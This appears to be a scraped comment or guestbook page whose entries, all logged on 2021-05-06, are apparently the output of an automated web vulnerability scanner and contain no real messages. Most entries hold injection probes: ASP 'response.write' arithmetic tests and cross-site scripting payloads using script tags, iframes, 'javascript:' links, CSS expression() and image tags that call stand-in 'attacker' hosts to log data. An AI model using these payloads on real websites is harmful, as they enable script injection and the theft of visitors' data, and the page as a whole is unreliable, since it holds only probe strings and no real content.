  2021-05-06 08:26:47


  '+response.write(9943498*9004823)+'


 • pHqghUme

  2021-05-06 08:26:47


  "+response.write(9943498*9004823)+"


 • "+response.write(9787999*9154159)+"

  2021-05-06 08:26:46


  1


 • pHqghUme

  2021-05-06 08:26:46


  response.write(9943498*9004823)


 • response.write(9787999*9154159)

  2021-05-06 08:26:45


  1


 • '+response.write(9787999*9154159)+'

  2021-05-06 08:26:45


  1


 • pHqghUme

  2021-05-06 08:26:44


  1


 • pHqghUme

  2021-05-06 08:26:43


  1


 • pHqghUme

  2021-05-06 08:26:43


  1


 • pHqghUme

  2021-05-06 08:26:42


  1


 • pHqghUme

  2021-05-06 08:26:42


  1


 • pHqghUme

  2021-05-06 08:26:41


  1


 • pHqghUme

  2021-05-06 08:26:37


  1Bg7rsE6ezO


 • pHqghUme

  2021-05-06 08:26:36


  1


 • 14dEmkIQ8O

  2021-05-06 08:26:36


  1


 • pHqghUme

  2021-05-06 08:26:35


  1


 • pHqghUme

  2021-05-06 08:04:11


  1


 • pHqghUme

  2021-05-06 05:50:10


  1<TLdL8r<


 • pHqghUme

  2021-05-06 05:49:59


  1<img sRc='http://attacker-9443/log.php?


 • pHqghUme

  2021-05-06 05:49:47


  1<nISz6W x=9414>


 • pHqghUme

  2021-05-06 05:49:37


  1<ifRAme sRc=9078.com></IfRamE>


 • pHqghUme

  2021-05-06 05:49:27


  1<WELVJT>XFKMP[!+!]</WELVJT>


 • pHqghUme

  2021-05-06 05:49:16


  1XAjWR <ScRiPt >GxNP(9791)</ScRiPt>


 • pHqghUme<0qPcfi<

  2021-05-06 05:49:04


  1


 • pHqghUme<img sRc='http://attacker-9010/log.php?

  2021-05-06 05:48:57


  1


 • pHqghUme

  2021-05-06 05:48:49


  1<% contenteditable onresize=GxNP(9129)>


 • pHqghUme<ECMzNX x=9894>

  2021-05-06 05:48:39


  1


 • pHqghUme

  2021-05-06 05:48:39


  1}body{acu:Expre/**/SSion(GxNP(9914))}


 • pHqghUme

  2021-05-06 05:48:30


  <a HrEF=jaVaScRiPT:>


 • pHqghUme<ifRAme sRc=9851.com></IfRamE>

  2021-05-06 05:48:14


  1


 • pHqghUme

  2021-05-06 05:48:14


  <a HrEF=http://xss.bxss.me></a>